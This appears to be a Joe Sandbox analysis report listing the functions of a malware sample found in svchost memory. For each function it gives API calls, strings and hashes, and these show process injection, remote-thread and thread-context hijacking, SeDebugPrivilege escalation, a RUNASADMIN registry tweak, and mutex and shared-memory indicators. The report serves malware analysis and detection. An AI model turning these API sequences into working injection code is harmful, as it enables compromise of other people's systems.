Function 00000001800067AC Relevance: 25.7, APIs: 17, Instructions: 227
threadinjectionsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAllocEx.KERNEL32 ref: 0000000180006862
WriteProcessMemory.KERNELBASE ref: 00000001800068E6
WriteProcessMemory.KERNELBASE ref: 000000018000690F
WriteProcessMemory.KERNELBASE ref: 0000000180006935
WriteProcessMemory.KERNELBASE ref: 0000000180006962
VirtualProtectEx.KERNEL32 ref: 000000018000699B
CreateRemoteThread.KERNEL32 ref: 0000000180006A03
WaitForSingleObject.KERNEL32 ref: 0000000180006A22
CloseHandle.KERNEL32 ref: 0000000180006A2B
VirtualFreeEx.KERNELBASE ref: 0000000180006A58
OutputDebugStringW.KERNEL32 ref: 0000000180006A85
Wow64GetThreadContext.KERNEL32 ref: 0000000180006ACB
Wow64SetThreadContext.KERNELBASE ref: 0000000180006AF5
GetThreadContext.KERNEL32 ref: 0000000180006B21
SetThreadContext.KERNEL32 ref: 0000000180006B49
ResumeThread.KERNELBASE ref: 0000000180006B7A
WaitForSingleObject.KERNEL32 ref: 0000000180006B88

Memory Dump Source

Source File: 00000001.00000002.3292762928.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000001.00000002.3292689800.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3292903685.0000000180016000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3292982056.0000000180022000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3293054483.0000000180026000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000000_svchost.jbxd

Yara matches

Similarity

API ID: Thread$ContextMemoryProcessWrite$Virtual$ObjectSingleWaitWow64$AllocCloseCreateDebugFreeHandleOutputProtectRemoteResumeString
String ID:
API String ID: 2704266222-0
Opcode ID: 566d3de7a8aa8f922ccdf83bc4f164a0abd4f00b1abb1b6ecbb5eee3bb1cb91f
Instruction ID: 48a320c14681a11773e42cba07975039505394bec5cfcad3e3eb669fb640e2ea
Opcode Fuzzy Hash: 566d3de7a8aa8f922ccdf83bc4f164a0abd4f00b1abb1b6ecbb5eee3bb1cb91f
Instruction Fuzzy Hash: 2FA17F72704B8482EBA2DF11E84039A77A5F789BC4F54C125EE8957BA8DF3DC649CB01

Function 00000001800024D0 Relevance: 19.4, APIs: 5, Strings: 6, Instructions: 172
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileA.KERNELBASE ref: 0000000180002564
_time64.LIBCMT ref: 0000000180002579
FindNextFileA.KERNELBASE ref: 000000018000258E
wsprintfA.USER32 ref: 0000000180002623
FindNextFileA.KERNELBASE ref: 0000000180002773

Strings

svchost.exe, xrefs: 000000018000271F
eyoorun.exe, xrefs: 0000000180002756
\*.exe, xrefs: 000000018000253A
%s\%s, xrefs: 0000000180002611
C:\Windows\SysWOW64, xrefs: 0000000180002502
cmd.exe, xrefs: 00000001800025A4

Memory Dump Source

Source File: 00000001.00000002.3292762928.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000001.00000002.3292689800.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3292903685.0000000180016000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3292982056.0000000180022000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3293054483.0000000180026000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000000_svchost.jbxd

Yara matches

Similarity

API ID: FileFind$Next$First_time64wsprintf
String ID: %s\%s$C:\Windows\SysWOW64$\*.exe$cmd.exe$eyoorun.exe$svchost.exe
API String ID: 1338143221-945379052
Opcode ID: 05e6296f7022ad60ad3b34706873424fd7d325c3f60632fcd9d34c1757ac244c
Instruction ID: 863ca3a4a7715c7dae77e164a0577798d1b5151542436b42e0dde00baaeda3ca
Opcode Fuzzy Hash: 05e6296f7022ad60ad3b34706873424fd7d325c3f60632fcd9d34c1757ac244c
Instruction Fuzzy Hash: 5F818631208EC995EBA7DB29E8143E9B7A1FB5E7C4F44D111FA8942695EF39C349C700

Function 0000000180002D50 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 56
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindResourceExA.KERNEL32 ref: 0000000180002D72
LoadResource.KERNEL32 ref: 0000000180002D99
LockResource.KERNEL32 ref: 0000000180002DAC
SizeofResource.KERNEL32 ref: 0000000180002DC0
VirtualAlloc.KERNEL32 ref: 0000000180002DDB

Strings

RESD, xrefs: 0000000180002D63

Memory Dump Source

Source File: 00000001.00000002.3292762928.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000001.00000002.3292689800.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3292903685.0000000180016000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3292982056.0000000180022000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3293054483.0000000180026000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000000_svchost.jbxd

Yara matches

Similarity

API ID: Resource$AllocFindLoadLockSizeofVirtual
String ID: RESD
API String ID: 2160097198-3593919488
Opcode ID: 21ba1f57fe0ff2532fdd8ce493f4bfc310ef08f41bf5d9194ceb8acc0d49e603
Instruction ID: 755cd4d83b62b81cda5f700b88cc98866fe539ecaa23f45409046d2e84f7a741
Opcode Fuzzy Hash: 21ba1f57fe0ff2532fdd8ce493f4bfc310ef08f41bf5d9194ceb8acc0d49e603
Instruction Fuzzy Hash: 9A116D31712B8481EFD7CB16A81439A67A1EB4CFC0F088436ED0E47B65EE38CA598700

Function 0000000180003D40 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 32
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000180003E0A), ref: 0000000180003D53
OpenProcessToken.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,0000000180003E0A), ref: 0000000180003D66
LookupPrivilegeValueA.ADVAPI32 ref: 0000000180003D7A
AdjustTokenPrivileges.ADVAPI32 ref: 0000000180003DB6
CloseHandle.KERNELBASE ref: 0000000180003DC1

Strings

SeDebugPrivilege, xrefs: 0000000180003D71

Memory Dump Source

Source File: 00000001.00000002.3292762928.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000001.00000002.3292689800.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3292903685.0000000180016000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3292982056.0000000180022000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3293054483.0000000180026000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000000_svchost.jbxd

Yara matches

Similarity

API ID: ProcessToken$AdjustCloseCurrentHandleLookupOpenPrivilegePrivilegesValue
String ID: SeDebugPrivilege
API String ID: 3038321057-2896544425
Opcode ID: cb934724524889619ee85fd417e9e10cd1c19fd43cf88e6a624b0549bbaf769e
Instruction ID: 4a4d0bcc5021dd84a9b9fd0f06170f536b472f24006b546454631718155e06c9
Opcode Fuzzy Hash: cb934724524889619ee85fd417e9e10cd1c19fd43cf88e6a624b0549bbaf769e
Instruction Fuzzy Hash: E0010976515F8582EB52DB50F81938AB7A0F78DB94F815016FA8A03728DF3DC20CCB00

Function 0000000180002A40 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 144
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00000001800017D0: LocalAlloc.KERNEL32 ref: 0000000180001863
Part of subcall function 00000001800017D0: WideCharToMultiByte.KERNEL32 ref: 000000018000189F
Part of subcall function 00000001800017D0: LocalFree.KERNEL32 ref: 00000001800018CA

Part of subcall function 00000001800018F0: GetComputerNameA.KERNEL32 ref: 0000000180001977

sprintf.LIBCMT ref: 0000000180002AD8

Part of subcall function 0000000180006E38: _errno.LIBCMT ref: 0000000180006E70
Part of subcall function 0000000180006E38: _invalid_parameter_noinfo.LIBCMT ref: 0000000180006E7B

Part of subcall function 0000000180006050: sprintf.LIBCMT ref: 00000001800060EE

OpenMutexA.KERNEL32 ref: 0000000180002B54
GetLastError.KERNEL32 ref: 0000000180002B5D
OpenMutexA.KERNEL32 ref: 0000000180002B7D
GetLastError.KERNEL32 ref: 0000000180002B86
CreateMutexExA.KERNELBASE ref: 0000000180002BBA
CreateMutexExA.KERNELBASE ref: 0000000180002BDC
ReleaseMutex.KERNEL32 ref: 0000000180002BEE
CloseHandle.KERNEL32 ref: 0000000180002BF7
ReleaseMutex.KERNEL32 ref: 0000000180002C00
CloseHandle.KERNEL32 ref: 0000000180002C09

Strings

%s$%s@!%s, xrefs: 0000000180002ACD
aba.#h7*83#.(om, xrefs: 0000000180002AC6

Memory Dump Source

Source File: 00000001.00000002.3292762928.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000001.00000002.3292689800.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3292903685.0000000180016000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3292982056.0000000180022000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3293054483.0000000180026000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000000_svchost.jbxd

Yara matches

Similarity

API ID: Mutex$CloseCreateErrorHandleLastLocalOpenReleasesprintf$AllocByteCharComputerFreeMultiNameWide_errno_invalid_parameter_noinfo
String ID: %s$%s@!%s$aba.#h7*83#.(om
API String ID: 3800965093-2428214157
Opcode ID: 413cd086f97a7dfdeca0f93bcd52b8ebf499f4cabfbbe0178fda36436d7e863f
Instruction ID: c12e6893bc04c646664e2919d067745ebb5e196151121e6cc137700703bcd157
Opcode Fuzzy Hash: 413cd086f97a7dfdeca0f93bcd52b8ebf499f4cabfbbe0178fda36436d7e863f
Instruction Fuzzy Hash: 20618C32604B88C6FB52DF65E8443CE77B1F789794F508126FA8A53AA9CF39C648C740

Function 0000000180001EB0 Relevance: 22.9, APIs: 9, Strings: 4, Instructions: 127
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00000001800018F0: GetComputerNameA.KERNEL32 ref: 0000000180001977

sprintf.LIBCMT ref: 0000000180001F63

Part of subcall function 0000000180006E38: _errno.LIBCMT ref: 0000000180006E70
Part of subcall function 0000000180006E38: _invalid_parameter_noinfo.LIBCMT ref: 0000000180006E7B

Part of subcall function 0000000180006050: sprintf.LIBCMT ref: 00000001800060EE

OpenMutexA.KERNEL32 ref: 0000000180001FE1
GetLastError.KERNEL32 ref: 0000000180001FEA
OpenMutexA.KERNEL32 ref: 000000018000200A
GetLastError.KERNEL32 ref: 0000000180002013
ReleaseMutex.KERNEL32 ref: 000000018000203B
CloseHandle.KERNELBASE ref: 0000000180002044
ReleaseMutex.KERNEL32 ref: 000000018000204D
CloseHandle.KERNEL32 ref: 0000000180002056

Strings

%s%s, xrefs: 0000000180001F58
dh74, xrefs: 0000000180001EEF
13a., xrefs: 0000000180001EE8
83y., xrefs: 0000000180001EF6

Memory Dump Source

Source File: 00000001.00000002.3292762928.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000001.00000002.3292689800.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3292903685.0000000180016000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3292982056.0000000180022000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3293054483.0000000180026000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000000_svchost.jbxd

Yara matches

Similarity

API ID: Mutex$CloseErrorHandleLastOpenReleasesprintf$ComputerName_errno_invalid_parameter_noinfo
String ID: %s%s$13a.$83y.$dh74
API String ID: 4133063299-3485211351
Opcode ID: dbe6c626c3480dc245ab38091f056625d80df6b733eebe0fde8e11a796b0c5d2
Instruction ID: 2874ade4f15da250015a476398c5eb14234b2bf6d31506aa08b3fc76c7029bd5
Opcode Fuzzy Hash: dbe6c626c3480dc245ab38091f056625d80df6b733eebe0fde8e11a796b0c5d2
Instruction Fuzzy Hash: 6C51B332A14B848AF792CB64E4443CE77B1F7887D4F508225FA9E57AA9CF78C649C740

Function 0000000180001560 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 60
registrylibraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32 ref: 000000018000159D
GetProcAddress.KERNEL32 ref: 00000001800015AD
GetCurrentProcess.KERNEL32 ref: 00000001800015BB
RegOpenKeyExW.KERNELBASE ref: 00000001800015F5
RegSetValueExW.ADVAPI32 ref: 0000000180001626
RegCloseKey.ADVAPI32 ref: 0000000180001636

Strings

RUNASADMIN, xrefs: 0000000180001604
IsWow64Process, xrefs: 00000001800015A3
kernel32, xrefs: 0000000180001585
Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers, xrefs: 00000001800015D4

Memory Dump Source

Source File: 00000001.00000002.3292762928.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000001.00000002.3292689800.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3292903685.0000000180016000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3292982056.0000000180022000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3293054483.0000000180026000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000000_svchost.jbxd

Yara matches

Similarity

API ID: AddressCloseCurrentHandleModuleOpenProcProcessValue
String ID: IsWow64Process$RUNASADMIN$Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers$kernel32
API String ID: 329719994-3841156478
Opcode ID: 2d5683601c1b20c0f960e93eee74cc609262a46b97175e5ec50ba63b32fce81c
Instruction ID: cdeb3a2e714b38da8e323a6adf53a10610d26db7d72f9741ef6b4653cdc9832a
Opcode Fuzzy Hash: 2d5683601c1b20c0f960e93eee74cc609262a46b97175e5ec50ba63b32fce81c
Instruction Fuzzy Hash: 73211C31714B8486EB52DB15F88439A73A1F78DBD4F849125FA9E47B68DF38C249CB00

Function 0000000180002210 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 117
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileVersionInfoSizeA.KERNELBASE ref: 0000000180002262
malloc.LIBCMT ref: 0000000180002297

Part of subcall function 0000000180007414: _FF_MSGBANNER.LIBCMT ref: 0000000180007444
Part of subcall function 0000000180007414: _NMSG_WRITE.LIBCMT ref: 000000018000744E
Part of subcall function 0000000180007414: HeapAlloc.KERNEL32(?,?,00000000,000000018000BDCC,?,?,?,000000018000F4C0,?,?,?,000000018000F3BF,?,?,00000000,000000018000A256), ref: 0000000180007469
Part of subcall function 0000000180007414: _callnewh.LIBCMT ref: 0000000180007482
Part of subcall function 0000000180007414: _errno.LIBCMT ref: 000000018000748D
Part of subcall function 0000000180007414: _errno.LIBCMT ref: 0000000180007498

GetFileVersionInfoA.KERNELBASE ref: 00000001800022B4
VerQueryValueA.KERNELBASE ref: 00000001800022EF
sprintf.LIBCMT ref: 0000000180002313
VerQueryValueA.VERSION ref: 000000018000232F
free.LIBCMT ref: 0000000180002367

Strings

\VarFileInfo\Translation, xrefs: 00000001800022E5
\StringFileInfo\%04x%04x\ProductName, xrefs: 0000000180002307

Memory Dump Source

Source File: 00000001.00000002.3292762928.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000001.00000002.3292689800.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3292903685.0000000180016000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3292982056.0000000180022000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3293054483.0000000180026000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000000_svchost.jbxd

Yara matches

Similarity

API ID: FileInfoQueryValueVersion_errno$AllocHeapSize_callnewhfreemallocsprintf
String ID: \StringFileInfo\%04x%04x\ProductName$\VarFileInfo\Translation
API String ID: 854303657-240727937
Opcode ID: 938b9084050b12f7f51f4e5b3a0a94f65c5e6aedc38f4bf1dcb0040dab1e3ed7
Instruction ID: c21a65e27a419a60c8be3834bc11d52b8ef56f4e58ab3682cf3e5a8e83c9a7dc
Opcode Fuzzy Hash: 938b9084050b12f7f51f4e5b3a0a94f65c5e6aedc38f4bf1dcb0040dab1e3ed7
Instruction Fuzzy Hash: 4A51B372204B8982EB96DF65E8403DE77A1F389BE4F409111FA9947699CF38C399C740

Function 00000001800013C0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 33
fileCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileMappingA.KERNEL32 ref: 00000001800013E5
GetLastError.KERNEL32 ref: 00000001800013F7
MapViewOfFile.KERNELBASE ref: 000000018000141B
CloseHandle.KERNEL32 ref: 0000000180001434

Strings

Local\xdfsa345srszdf, xrefs: 00000001800013C7

Memory Dump Source

Source File: 00000001.00000002.3292762928.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000001.00000002.3292689800.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3292903685.0000000180016000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3292982056.0000000180022000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3293054483.0000000180026000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000000_svchost.jbxd

Yara matches

Similarity

API ID: File$CloseCreateErrorHandleLastMappingView
String ID: Local\xdfsa345srszdf
API String ID: 1661045500-2207739924
Opcode ID: 2056533ad930ce1928ccbe262b10e01048e0b68bc08cbd84cdd65ea3b3db014f
Instruction ID: 3f27ef63e921679977fe6c1940a6dfdffcf72fbf18764cef409eb90716e0d065
Opcode Fuzzy Hash: 2056533ad930ce1928ccbe262b10e01048e0b68bc08cbd84cdd65ea3b3db014f
Instruction Fuzzy Hash: 93011D35A01E4486EBE39B14A81179633E0AB9D3A5F959214AA6D07BB0EF3C835DDB00

Function 00000001800066A4 Relevance: 6.1, APIs: 4, Instructions: 73
processstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE ref: 0000000180006738
lstrlenW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,00000000), ref: 0000000180006745

Part of subcall function 00000001800067AC: VirtualAllocEx.KERNEL32 ref: 0000000180006862
Part of subcall function 00000001800067AC: WriteProcessMemory.KERNELBASE ref: 00000001800068E6
Part of subcall function 00000001800067AC: WriteProcessMemory.KERNELBASE ref: 000000018000690F
Part of subcall function 00000001800067AC: WriteProcessMemory.KERNELBASE ref: 0000000180006935
Part of subcall function 00000001800067AC: WriteProcessMemory.KERNELBASE ref: 0000000180006962

TerminateProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,00000000), ref: 0000000180006786
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,00000000), ref: 0000000180006790

Memory Dump Source

Source File: 00000001.00000002.3292762928.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000001.00000002.3292689800.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3292903685.0000000180016000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3292982056.0000000180022000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3293054483.0000000180026000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000000_svchost.jbxd

Yara matches

Similarity

API ID: Process$MemoryWrite$AllocCreateErrorLastTerminateVirtuallstrlen
String ID:
API String ID: 314352606-0
Opcode ID: a627acf18c057e6c1b37a91aa07843e52c1f40f30956bb822cfd9055965b5ad1
Instruction ID: b8bdd9fdbc95cdffbefc913a4e0f777a3a93423ee4eaf517f882a8fe62165932
Opcode Fuzzy Hash: a627acf18c057e6c1b37a91aa07843e52c1f40f30956bb822cfd9055965b5ad1
Instruction Fuzzy Hash: 6621E27261875482EBA2CB55F80479AB7E5F78D7E4F458525BE4983B94DF3CC5088700

Function 0000000180003DE0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49
threadCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00000001800013C0: CreateFileMappingA.KERNEL32 ref: 00000001800013E5
Part of subcall function 00000001800013C0: GetLastError.KERNEL32 ref: 00000001800013F7

Part of subcall function 0000000180003D40: GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000180003E0A), ref: 0000000180003D53
Part of subcall function 0000000180003D40: OpenProcessToken.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,0000000180003E0A), ref: 0000000180003D66
Part of subcall function 0000000180003D40: LookupPrivilegeValueA.ADVAPI32 ref: 0000000180003D7A
Part of subcall function 0000000180003D40: AdjustTokenPrivileges.ADVAPI32 ref: 0000000180003DB6
Part of subcall function 0000000180003D40: CloseHandle.KERNELBASE ref: 0000000180003DC1

GetCurrentProcessId.KERNEL32(?,?,?,?,?,000000018000824E), ref: 0000000180003E0A

Part of subcall function 0000000180001450: _wcsftime_l.LIBCMT ref: 00000001800014B7

CreateThread.KERNELBASE ref: 0000000180003E81

Strings

i:%d r:%d, xrefs: 0000000180003E10

Memory Dump Source

Source File: 00000001.00000002.3292762928.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000001.00000002.3292689800.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3292903685.0000000180016000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3292982056.0000000180022000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3293054483.0000000180026000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000000_svchost.jbxd

Yara matches

Similarity

API ID: Process$CreateCurrentToken$AdjustCloseErrorFileHandleLastLookupMappingOpenPrivilegePrivilegesThreadValue_wcsftime_l
String ID: i:%d r:%d
API String ID: 763594233-2265146720
Opcode ID: c42333cd7d617a8df298f204f429bd3f302c9f9ed74dddf0a8b8520cb017b13a
Instruction ID: 490f34cdb8a03b8733192fba0e704fb505af10175a091e6a183f27313ace56a5
Opcode Fuzzy Hash: c42333cd7d617a8df298f204f429bd3f302c9f9ed74dddf0a8b8520cb017b13a
Instruction Fuzzy Hash: A6118B35A04A8891E793DB62F8423D972A4B39C7E0F50C225FA6907AE6DF38874C8740

Function 00000001800020F0 Relevance: 4.6, APIs: 3, Instructions: 64
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileA.KERNELBASE ref: 0000000180002155
ReadFile.KERNELBASE ref: 000000018000217C
CloseHandle.KERNEL32 ref: 00000001800021CD

Memory Dump Source

Source File: 00000001.00000002.3292762928.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000001.00000002.3292689800.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3292903685.0000000180016000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3292982056.0000000180022000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3293054483.0000000180026000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000000_svchost.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandleRead
String ID:
API String ID: 1035965006-0
Opcode ID: a62afd48bd7b5c632a329c3c8a341a79fa5298a6d0d02ac82d9265fad697703e
Instruction ID: 23d1192ce527e3ddbd9136285bea29a03487477f0838dd7d415faac91fb35e48
Opcode Fuzzy Hash: a62afd48bd7b5c632a329c3c8a341a79fa5298a6d0d02ac82d9265fad697703e
Instruction Fuzzy Hash: 03219631204A9881EBA2DF51E8547EAB3A0F758BD4F54C224EB9803BC4DF78C6598B40

Non-executed Functions

Function 0000000180010040 Relevance: 42.5, APIs: 23, Strings: 1, Instructions: 460
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_errno.LIBCMT ref: 000000018001009D
_invalid_parameter_noinfo.LIBCMT ref: 00000001800100A8

Strings

U, xrefs: 000000018001060A

Memory Dump Source

Source File: 00000001.00000002.3292762928.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000001.00000002.3292689800.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3292903685.0000000180016000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3292982056.0000000180022000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3293054483.0000000180026000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000000_svchost.jbxd

Yara matches

Similarity

API ID: _errno_invalid_parameter_noinfo
String ID: U
API String ID: 2959964966-4171548499
Opcode ID: 7867c91d87ff0c411f054b43056a2f601585e8651b4d9676e42afd6711bb8b24
Instruction ID: 2da888aa20696b1050f93bbd12bbbb3519b3bd5b1e20ee00050e1f47978b0431
Opcode Fuzzy Hash: 7867c91d87ff0c411f054b43056a2f601585e8651b4d9676e42afd6711bb8b24
Instruction Fuzzy Hash: 6512E272204E4986EBA28F24D4843DE77A1F78C7C4F608116FAC987A95DFB9D749CB10

Function 0000000180001C40 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 141synchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 00000001800017D0: LocalAlloc.KERNEL32 ref: 0000000180001863
Part of subcall function 00000001800017D0: WideCharToMultiByte.KERNEL32 ref: 000000018000189F
Part of subcall function 00000001800017D0: LocalFree.KERNEL32 ref: 00000001800018CA

Part of subcall function 00000001800018F0: GetComputerNameA.KERNEL32 ref: 0000000180001977

sprintf.LIBCMT ref: 0000000180001D10

Part of subcall function 0000000180006E38: _errno.LIBCMT ref: 0000000180006E70
Part of subcall function 0000000180006E38: _invalid_parameter_noinfo.LIBCMT ref: 0000000180006E7B

Part of subcall function 0000000180006050: sprintf.LIBCMT ref: 00000001800060EE

OpenMutexA.KERNEL32 ref: 0000000180001DA3
GetLastError.KERNEL32 ref: 0000000180001DAC
OpenMutexA.KERNEL32 ref: 0000000180001DD1
GetLastError.KERNEL32 ref: 0000000180001DDA
ReleaseMutex.KERNEL32 ref: 0000000180001DEF
CloseHandle.KERNEL32 ref: 0000000180001DF8

Strings

2#b., xrefs: 0000000180001C82
gnbc344asd, xrefs: 0000000180001D1B
83%1, xrefs: 0000000180001C90
%s%s%saz$%^$%@#sa$EEFsd2, xrefs: 0000000180001D05
dg79, xrefs: 0000000180001C89

Memory Dump Source

Source File: 00000001.00000002.3292762928.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000001.00000002.3292689800.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3292903685.0000000180016000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3292982056.0000000180022000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3293054483.0000000180026000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000000_svchost.jbxd

Yara matches

Similarity

API ID: Mutex$ErrorLastLocalOpensprintf$AllocByteCharCloseComputerFreeHandleMultiNameReleaseWide_errno_invalid_parameter_noinfo
String ID: %s%s%saz$%^$%@#sa$EEFsd2$2#b.$83%1$dg79$gnbc344asd
API String ID: 3147222814-918932147
Opcode ID: 98fed7bc4a1050010b08977139a49ba924978a52dabcd1c4ef6de1547bd9ad9f
Instruction ID: 293e967c104a2474f007c174b3d6cb4870e75df93d6087c018f724553ae28c8f
Opcode Fuzzy Hash: 98fed7bc4a1050010b08977139a49ba924978a52dabcd1c4ef6de1547bd9ad9f
